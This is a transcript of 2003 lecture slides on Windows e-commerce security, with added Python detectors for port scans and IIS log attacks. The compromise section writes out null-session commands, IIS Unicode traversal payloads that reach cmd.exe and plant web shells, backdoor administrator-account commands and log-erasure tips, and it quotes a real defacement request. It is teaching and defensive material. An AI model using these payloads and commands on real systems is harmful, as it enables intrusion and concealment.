
Windows Security Analysis Computer Science E-Commerce Security ‘2003’


Presentation Transcript


  1. Windows Security Analysis: Computer Science E-Commerce Security ‘2003’. Matthew Cook, http://escarpment.net/

  2. Introduction Loughborough University http://www.lboro.ac.uk/computing/ Bandwidth Management Advisory Service http://bmas.ja.net/

  3. Windows Security Analysis • Introduction • Step-by-step Machine Compromise • Preventing Attack • Incident Response • Further Reading

  4. Introduction Basic Security Overview

  5. Physical Security • Secure Location • BIOS restrictions • Password Protection • Boot Devices • Case Locks • Case Panels

  6. Security Threats • Denial of Service • Theft of information • Modification • Fabrication (Spoofing or Masquerading)

  7. Security Threats… Why a compromise can occur: • Physical Security Holes • Software Security Holes • Incompatible Usage Security Holes • Social Engineering • Complacency

  8. The Easiest Security Improvement • Good passwords • Usernames and Passwords are the primary security defence • Use a password that is easy to type to avoid ‘Shoulder Surfers’ • Use the first letters from song titles, song lyrics or film quotations

  9. Can you buy Security? “This system is secure.” A product vendor might say: “This product makes your network secure.” Or: “We secure e-commerce.” Inevitably, these claims are naïve and simplistic. They look at the security of the product, rather than the security of the system. The first questions to ask are: “Secure from whom?” and “Secure against what?” Bruce Schneier

  10. Step-by-step Machine Compromise Why, where, how?

  11. Background Reasons for Attack: • Personal Issues • Political Statement • Financial Gain (Theft of money, information) • Learning Experience • DoS (Denial of Service) • Support for Illegal Activity

  12. Gathering Information • Companies House • Internet Search, URL: http://www.google.co.uk • Whois, URL: http://www.netsol.com/cgi-bin/whois/whois • A Whois query can provide: • The Registrant • The Domain Names Registered • The Administrative, Technical and Billing Contact • Record updated and created date stamps • DNS Servers for the Domain

  13. Gathering Information… • Use Nslookup or dig • dig @<dns server> <machine address> • Different query types available: • A – Network address • Any – All or Any Information available • Mx – Mail exchange records • Soa – Start of Authority • Hinfo – Host information • Axfr – Zone Transfer • Txt – Additional strings

  14. Identifying System Weakness Many products available: • Nmap • Nessus • Pandora • Pwdump • L0pht Crack • Null Authentication

  15. Nmap • Port Scanning Tool • Stealth scanning, OS Fingerprinting • Open Source • Runs under Unix-based OS • Port under development for Win32 • URL: http://www.insecure.org/nmap/

  16. Nmap

  17. Nessus • Remote security scanner • Very comprehensive • Frequently updated modules • Testing of DoS attacks • Open Source • Win32 and Java Client • URL: http://nessus.org/

  18. pwdump • Version 3 (e = encrypted) • Developed by Phil Staubs and Erik Hjelmstad • Based on pwdump and pwdump2 • URL: http://www.ebiz-tech.com/html/pwdump.html • Needs Administrative Privileges • Extracts hashes even if syskey is installed • Extracts from remote machines • Identifies accounts with no password • Self-contained utility

  19. L0pht Crack • Password Auditing and Recovery • Crack Passwords from many sources • Registration $249 • URL: http://www.atstake.com/research/lc3/

  20. L0pht Crack Crack Passwords from: • Local Machine • Remote Machine • SAM File • SMB Sniffer • PWDump file

  21. Nmap Analysis • nmap -sP 158.125.0.0/16 • Ping scan! • nmap -sS 158.125.0.0/16 • Stealth (SYN) scan

  22. Nmap Analysis… • TCP Connect Scan • Completes a ‘Three Way Handshake’ • Very noisy (Detection by IDS)

  23. Nmap Analysis… • TCP SYN Scan • Half open scanning (Full port TCP connection not made) • Less noisy than the TCP Connect Scan

  24. Nmap Analysis… • TCP FIN Scan • FIN Packet sent to target port • RST returned for all closed ports • Mostly works on UNIX-based TCP/IP stacks • TCP Xmas Tree Scan • Sends a FIN, URG and PUSH packet • RST returned for all closed ports • TCP Null Scan • Turns off all flags • RST returned for all closed ports • UDP Scan • UDP Packet sent to target port • “ICMP Port Unreachable” for closed ports
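Slides 22 to 24 describe the connect, SYN, FIN, Xmas tree and Null scans an IDS has to recognise. The classifier below is an added example, not from the presentation: it applies the half-open versus completed-handshake distinction to constructed client-side packet summaries; the addresses, ports, thresholds and the tcpdump-style flag letters are assumptions made for illustration.

```python
from collections import defaultdict
TARGET = "158.125.1.10"  # constructed target address

# Constructed client-side packet summaries: (time_s, src, dst, dst_port, flags).
# Flag letters follow tcpdump: S=SYN, A=ACK, F=FIN, P=PUSH, U=URG.
SAMPLE_PACKETS = (
    # half-open scan: SYN to eight ports in 70 ms, handshake never completed
    [(0.01 * i, "203.0.113.9", TARGET, p, "S")
     for i, p in enumerate([21, 22, 23, 25, 80, 110, 139, 445])]
    # ordinary client: SYN then the completing ACK, two ports, well apart in time
    + [(5.0, "198.51.100.4", TARGET, 80, "S"), (5.01, "198.51.100.4", TARGET, 80, "A"),
       (95.0, "198.51.100.4", TARGET, 443, "S"), (95.01, "198.51.100.4", TARGET, 443, "A")]
    # Xmas tree scan: FIN, URG and PUSH set, no SYN at all
    + [(120.0 + 0.01 * i, "203.0.113.77", TARGET, p, "FPU")
       for i, p in enumerate([21, 22, 23, 25, 80, 110])]
)

STEALTH_KINDS = {"F": "fin-scan", "FPU": "xmas-scan", "": "null-scan"}

def max_distinct_ports(events, window):
    """Most distinct ports seen in any `window`-second span of (time, port) events."""
    events = sorted(events)
    counts, lo, best = {}, 0, 0
    for t, port in events:
        counts[port] = counts.get(port, 0) + 1
        while t - events[lo][0] > window:       # slide the window forward
            old = events[lo][1]
            counts[old] -= 1
            if counts[old] == 0:
                del counts[old]
            lo += 1
        best = max(best, len(counts))
    return best

def detect_scans(packets, port_threshold=5, window=2.0):
    """Map each scanning source to syn-scan, connect-scan, fin-, xmas- or null-scan."""
    by_src = defaultdict(list)
    for pkt in packets:
        by_src[pkt[1]].append(pkt)
    findings = {}
    for src, pkts in by_src.items():
        syns = [(t, port) for t, _, _, port, fl in pkts if fl == "S"]
        acked = {port for _, _, _, port, fl in pkts if fl == "A"}  # 3rd handshake step
        if max_distinct_ports(syns, window) >= port_threshold:
            completed = {p for _, p in syns} & acked
            findings[src] = "connect-scan" if len(completed) >= port_threshold else "syn-scan"
        for flags, kind in STEALTH_KINDS.items():
            probes = [(t, port) for t, _, _, port, fl in pkts if fl == flags]
            if max_distinct_ports(probes, window) >= port_threshold:
                findings[src] = kind
    return findings
```

Only the client's packets are modelled, so a connect scan is recognised by the client's own completing ACK rather than by the server's SYN/ACK.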

  25. Null Authentication Null Authentication: • net use \\camford\IPC$ "" /u:"" • Famous tools like ‘Red Button’ • net view \\camford • List of Users, groups and shares • Last logged on date • Last password change • Much more…

  26. Exploiting the Security Hole • Using IIS Unicode/Directory Traversal • /scripts/../../winnt/system32/cmd.exe /c+dir • /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir • Displays the listing of c: in browser • Copy cmd.exe to /scripts/root.exe • Echo upload.asp • GET /scripts/root.exe /c+echo+[blah]>upload.asp • Upload cmdasp.asp using upload.asp • Still vulnerable on 24% of E-Commerce servers

  27. Gaining ‘Root’ • Cmdasp.asp provides a cmd shell in the SYSTEM context • Increase in privileges is now simple • ISAPI.dll – RevertToSelf (Horovitz) • Version 2 coded by Foundstone • http://camford/scripts/idq.dll? • Patch Bulletin: MS01-26 • NOT included in Windows 2000 SP2

  28. Backdoor Access • Create several user accounts • Net user iisservice <pass> /ADD • Net localgroup administrators iisservice /ADD • Add root shells on high end ports • Tiri is 3Kb in size • Add backdoors to ‘Run’ registry keys

  29. System Alteration • Web page alteration • Information Theft • Enable services • Add VNC • Creating a Warez Server • Net start msftpsvc • Check access • Upload file 1Mb in size • Advertise as a warez server

  30. Audit Trail Removal • Many machines have auditing disabled • Main problems are IIS logs • DoS IIS before logs sync to disc • Erase logs from hard disc • Erasing Eventlog harder • IDS Systems • Network Monitoring at firewall

  31. Preventing Attack How to stop the attack from happening and how to limit the damage from crackers!

  32. NetBIOS/SMB Services • NetBIOS Browsing Request [UDP 137] • NetBIOS Browsing Response [UDP 138] • NetBIOS Communications [TCP 135] • CIFS [TCP 139, TCP 445, UDP 445] • Port 445 Windows 2000 only • Block ports at firewall • netstat -a

  33. NetBIOS/SMB Services… To disable NetBIOS • Select ‘Disable NetBIOS’ in the WINS tab of advanced TCP/IP properties. • Deselect ‘File and Print sharing’ in the advanced settings of the ‘Network and Dial-up connections’ window

  34. NetBIOS/SMB Services… Disable Null Authentication • HKLM\SYSTEM\CurrentControlSet\Control\LSA\RestrictAnonymous • REG_DWORD set to 0, 1 or 2! • HKLM\SYSTEM\CurrentControlSet\Control\SecurePipeServers\RestrictAnonymous • REG_DWORD set to 0 or 1

  35. Operating System Patching • Operating Systems do contain bugs, and patches are a common method of distributing the fixes. • A patch or hotfix usually contains a fix for one discovered bug. • Service packs contain multiple patches or hotfixes. There are well over 200 hotfixes in the soon-to-be-released SP4 for Windows 2000.

  36. Operating System Patching… • Only install patches after you have tested them in a development environment. • Only install patches obtained directly from the vendor. • Install security patches as soon as possible after release. • Install feature patches as and when needed. • Automate patch collection and installation as much as possible (QChain).

  37. Operating System Patching… Use automated patching technology: • SUS – Microsoft Software Update Service • SMS – Microsoft Systems Management Server • Ghost – Symantec imaging software. And other application deployment software: • Lights out Distribution • Deferred installation

  38. Baseline Security Analyzer • Freely available from Microsoft • Written by Shavlik Technologies as a direct result of Code Red attacks • A GUI to HFNetChk (v3.81) • Improved feature set • Integrated SUS functionality

  39. Baseline Security Analyzer… MBSA v1.1 supports the following host OS: • Windows 2000 Professional / Server • Windows XP Home / Professional • Windows .NET not officially supported • Windows NT not supported as host OS • Remote scanning available

  40. Baseline Security Analyzer… What applications does MBSA scan? • Operating system • Internet Explorer > 5.01 • Microsoft Office 2000 and 2002 • Media Player > 6.4 • Internet Information Services 4.0 and 5.0 • SQL Server 7.0 and 2000 • Exchange Server 5.5 and 2000

  41. IPSec • IP security • Linux Connectivity using FreeS/WAN • Mainly for wireless use • WEP encryption cracked • URL: http://www.freeswan.org/ • URL: http://airsnort.sourceforge.net/

  42. Recent Worms • Sadmind/IIS – Directory Traversal (Unicode Exploit) • CodeRed – ida/idq buffer overflow • CodeGreen – ida/idq buffer overflow • Nimda – Directory Traversal (Unicode Exploit) • Slammer – MS SQL Server transaction control

  43. Sadmind/IIS • 2001-05-03 22:34:49 203.67.x.x - 158.125.x.x 80 GET /scripts/root.exe /c+echo+^<html^>^<body+bgcolor%3Dblack^>^<br^>^<br^>^<br^>^<br^>^<br^>^<br^>^<table+width%3D100%^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>f***+USA+Government^</font^>^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>f***+PoizonBOx^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D4+color%3Dred^>contact:sysadmcn@yahoo.com.cn^</html^>>../wwwroot/default.htm 200 -
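The Unicode/traversal requests on slide 26 and the Sadmind/IIS log line on slide 43 leave a recognisable trace in the IIS W3C extended log. The detector below is an added example, not from the original presentation: the sample log lines and addresses are constructed, and the two overlong encodings it lists are the ones commonly associated with the IIS Unicode bug, assumed here for illustration.

```python
import re
from urllib.parse import unquote

# Constructed sample lines in the IIS W3C extended format the slide shows:
# date time c-ip user s-ip s-port method uri-stem uri-query status agent
SAMPLE_LOG = """\
2001-05-03 22:34:49 203.67.1.1 - 158.125.1.1 80 GET /scripts/root.exe /c+echo+x>../wwwroot/default.htm 200 -
2001-05-03 22:35:02 203.67.1.1 - 158.125.1.1 80 GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+dir 200 -
2001-05-03 22:35:10 203.67.1.1 - 158.125.1.1 80 GET /scripts/../../winnt/system32/cmd.exe /c+dir 404 -
2001-05-03 22:36:00 10.0.0.5 - 158.125.1.1 80 GET /index.htm - 200 -
"""

# Overlong UTF-8 encodings of '/' and '\' that the unpatched IIS decoder
# turned into path separators after its traversal check had already run.
OVERLONG_SLASH = re.compile(r"%c0%af|%c1%9c", re.IGNORECASE)
TRAVERSAL = re.compile(r"\.\.(?:/|$)")
# The binaries the slides show being reached through, or planted in, /scripts.
SHELL_BINARIES = re.compile(r"/(?:cmd|root)\.exe\b", re.IGNORECASE)

def classify_request(uri_stem, uri_query="-"):
    """Return the detection tags that apply to one logged request."""
    tags = []
    if OVERLONG_SLASH.search(uri_stem):
        tags.append("unicode-overlong")
    # Normalise the way the vulnerable server did: overlong bytes become '/',
    # percent-encoding is decoded twice (catches %255c-style double encoding),
    # and backslashes are treated as forward slashes.
    raw = OVERLONG_SLASH.sub("/", uri_stem + " " + uri_query)
    decoded = unquote(unquote(raw)).replace("\\", "/")
    if TRAVERSAL.search(decoded):
        tags.append("directory-traversal")
    if SHELL_BINARIES.search(decoded):
        tags.append("shell-binary")
    return tags

def scan_iis_log(text):
    """Return one finding per suspicious line; '#' lines are W3C log headers."""
    findings = []
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split()
        if len(fields) < 10:
            continue
        date, time, client, _user, _server, _port, method, stem, query, status = fields[:10]
        tags = classify_request(stem, query)
        if tags:
            findings.append({"time": f"{date} {time}", "client": client,
                             "method": method, "status": status, "tags": tags})
    return findings
```

A 404 on a traversal request is still worth keeping: it records an attempt against a server that was patched or had the path removed.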

  44. IDS Snort • IDS – Intrusion Detection System • Libpcap packet sniffer and logger • Originally developed for Unix platforms • Open Source • Port to Win32 available (Release 1.8.1) • Installation on Win32 in under 30 minutes • Run on your IIS server or standalone

  45. IDS Snort… Snort can detect: • Stealth Port Scans • CGI Attacks • Front Page Extensions Attacks • ICMP Activity • SMTP Activity • SQL Activity • SMB Probes

  46. Incident Response What to do when something does go wrong!

  47. Incident Response… • Don’t Panic! • Unplug the network • Get a notebook • Back-up the system and keep the Back-ups • Restrict use of email • Look for information • Investigate the cause • Request help and assistance.

  48. Incident Response… • Important to return to service swiftly • Do not jeopardize security • If in doubt, re-build • Perform forensics on a backup • Keep documentation and evidence • Contact local CERT if the investigation shows the activity is not worm or script-kiddie activity.

  49. Further Reading • Garfinkel, S. Web Security & Commerce, O’Reilly [ISBN 1-56592-269-7] • Hassler, V. Security Fundamentals for E-Commerce, Artech House [ISBN 1-58053-108-3] • Huth, M R A. Secure Communicating Systems, Cambridge University Press [ISBN 0-52180-731-X] • Schneier, B. Secrets & Lies (Digital Security in a Networked World) [ISBN 0-47125-311-1]

  50. Useful Books, Tools and URLs • Securing Windows NT/2000 Servers for the Internet. (Stefan Norberg.) • Incident Response. (Kenneth R. van Wyk, Richard Forno.) • Hacking Exposed: Network Security Secrets & Solutions. (Stuart McClure et al) • Hacking Exposed Windows 2000: Network Security Secrets and Solutions. (Scambray.)
